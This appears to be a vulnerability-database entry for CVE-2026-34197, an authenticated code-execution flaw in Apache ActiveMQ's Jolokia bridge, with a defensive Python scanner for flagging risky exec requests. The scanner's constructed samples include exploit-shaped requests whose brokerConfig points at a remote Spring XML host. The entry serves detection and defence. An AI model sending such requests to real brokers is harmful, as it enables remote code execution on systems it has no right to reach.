CVE-2026-34197
Published: 07 April 2026
Summary
CVE-2026-34197 is a high-severity Improper Input Validation (CWE-20) and code injection vulnerability in Apache ActiveMQ. Its CVSS base score is 8.8 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 0.1% of CVEs by exploit likelihood (EPSS), and CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2026-34197 is an improper input validation and code injection vulnerability affecting Apache ActiveMQ Broker, Apache ActiveMQ All, and Apache ActiveMQ in versions before 5.19.4 and in the 6.0.0 through 6.2.2 releases. The flaw stems from the Jolokia JMX-HTTP bridge exposed at /api/jolokia/ on the web console: its default access policy permits exec operations against all org.apache.activemq:* MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).
An authenticated attacker can invoke these operations with a crafted discovery URI that causes the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because the context instantiates all singleton beans before BrokerService performs configuration validation, the attacker achieves arbitrary code execution inside the broker JVM, for example by invoking Runtime.exec() from a bean factory method. Note that the only precondition is authentication to the web console, so a default or shared console password removes it in practice.
The Apache ActiveMQ security advisory and the oss-security posting both recommend an immediate upgrade to 5.19.4 or 6.2.3. CISA lists the CVE in its Known Exploited Vulnerabilities catalog, confirming in-the-wild exploitation. The EPSS score has remained consistently high (current 0.8346, peak 0.8529), indicating sustained exploitation interest since disclosure.
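As an added example (not code from the ActiveMQ or Jolokia projects, and not part of this advisory), the following Python triages Jolokia requests for the exec path described above. It parses both the JSON POST form and the GET URL form that Jolokia accepts, flags exec calls on org.apache.activemq:* MBeans, and escalates when the operation is addNetworkConnector or addConnector and an argument carries a brokerConfig that resolves to a remote Spring resource. The sample requests are constructed; the exact on-the-wire shape of a real exploit request and the request format a broker's access log would carry are assumptions.

```python
"""Triage Jolokia requests against the CVE-2026-34197 exec path.

Added example, not ActiveMQ or Jolokia project code. It parses Jolokia's
JSON POST form and GET URL form, then flags exec calls on org.apache.activemq:*
MBeans, escalating when the operation is addNetworkConnector/addConnector and
an argument carries a brokerConfig pointing at a remote resource. The sample
requests at the bottom are constructed, not captured traffic; the exact shape
of a real exploit request is an assumption here.
"""
import json
import re
from urllib.parse import unquote

RISKY_OPERATIONS = {"addNetworkConnector", "addConnector"}
ACTIVEMQ_DOMAIN = "org.apache.activemq:"
# Spring resource locations that would fetch the application context off-host
REMOTE_PREFIXES = ("http://", "https://", "ftp://")


def _op_name(operation):
    # Jolokia allows "addConnector(java.lang.String)" to select an overload
    return operation.split("(", 1)[0].strip()


def parse_post_body(body):
    """Return (mbean, operation, args) for each exec request in a JSON body.
    Jolokia accepts a single request object or a list (bulk request)."""
    data = json.loads(body)
    requests = data if isinstance(data, list) else [data]
    found = []
    for req in requests:
        if str(req.get("type", "")).lower() != "exec":
            continue
        args = [str(a) for a in req.get("arguments", [])]
        found.append((req.get("mbean", ""), _op_name(req.get("operation", "")), args))
    return found


def parse_get_path(path):
    """Parse the GET form /api/jolokia/exec/<mbean>/<operation>/<arg>/...
    Jolokia escapes '/' inside a segment as '!/' and '!' as '!!'."""
    marker = "/exec/"
    idx = path.find(marker)
    if idx < 0:
        return []
    rest = path[idx + len(marker):].split("?", 1)[0]
    segments = [unquote(s.replace("!/", "/").replace("!!", "!"))
                for s in re.split(r"(?<!!)/", rest)]
    if len(segments) < 2:
        return []
    return [(segments[0], _op_name(segments[1]), segments[2:])]


def has_remote_broker_config(uri):
    """True if any brokerConfig= option in the URI (including URIs nested in
    composite forms such as static:(...)) resolves to a remote location."""
    for match in re.finditer(r"brokerConfig=([^&)\s]+)", uri, re.IGNORECASE):
        location = unquote(match.group(1))
        # ActiveMQ accepts an xbean: prefix in front of the real resource location
        if location.lower().startswith("xbean:"):
            location = location[len("xbean:"):]
        if location.lower().startswith(REMOTE_PREFIXES):
            return True
    return False


def classify(mbean, operation, args):
    """Map one exec request to a severity, or None if it is out of scope."""
    if not mbean.startswith(ACTIVEMQ_DOMAIN):
        return None
    if operation not in RISKY_OPERATIONS:
        return "info"      # exec on a broker MBean: audit it, but not this bug
    if any(has_remote_broker_config(a) for a in args):
        return "critical"  # remote Spring context load: the RCE chain itself
    return "high"          # connector creation from the web console is rare


def scan(requests):
    """requests: iterable of (method, path, body). Returns a list of findings."""
    findings = []
    for method, path, body in requests:
        calls = parse_post_body(body) if method == "POST" and body else parse_get_path(path)
        for mbean, operation, args in calls:
            severity = classify(mbean, operation, args)
            if severity:
                findings.append({"severity": severity, "mbean": mbean,
                                 "operation": operation, "args": args})
    return findings


# Constructed sample traffic (not captured data); 203.0.113.0/24 is TEST-NET-3.
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_REQUESTS = [
    ("POST", "/api/jolokia/", json.dumps(
        {"type": "read", "mbean": BROKER, "attribute": "TotalEnqueueCount"})),
    ("POST", "/api/jolokia/", json.dumps(
        {"type": "exec", "mbean": BROKER + ",destinationType=Queue,destinationName=orders",
         "operation": "purge"})),
    ("POST", "/api/jolokia/", json.dumps(
        {"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector(java.lang.String)",
         "arguments": ["static:(tcp://10.0.0.5:61616)"]})),
    ("POST", "/api/jolokia/", json.dumps(
        {"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
         "arguments": ["static:(vm://x?brokerConfig=http://203.0.113.10/ctx.xml)"]})),
    ("GET", "/api/jolokia/exec/" + BROKER + "/addConnector/"
            "vm:!/!/y%3FbrokerConfig=xbean:http:!/!/203.0.113.10!/ctx.xml", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["severity"].upper(), finding["operation"], finding["args"])
```

Any "high" or "critical" finding from a web console client is worth an alert on its own, since a legitimate operator adds connectors from activemq.xml, not from Jolokia. The two operation names the scanner keys on are also the ones a deny entry in the Jolokia access policy would list, which is the Access Enforcement control described under Mitigating Controls.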
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-19588
Vulnerability details
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
- CWE(s): CWE-20 (Improper Input Validation)
- KEV Date Added: 16 April 2026
Related Threats
MITRE ATT&CK Enterprise Techniques
- Exploit Public-Facing Application (T1190)
Why these techniques?
The vulnerability sits in the Jolokia JMX-HTTP bridge exposed on the ActiveMQ web console, and an authenticated attacker reaches remote code execution through crafted MBean operations and remote Spring XML context loading; that is exploitation of a public-facing application in the T1190 sense.
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): Directly requires validation of all inputs, including discovery URIs and brokerConfig parameters, before they are processed by ResourceXmlApplicationContext or BrokerService methods.
- AC-3 (Access Enforcement): Enforces the Jolokia access policy so that exec operations on org.apache.activemq:* MBeans such as addNetworkConnector and addConnector are denied for non-privileged subjects.
- Least privilege for Jolokia users: Limits the privileges granted to authenticated Jolokia users so they cannot invoke high-risk BrokerService operations that lead to remote class loading and code execution.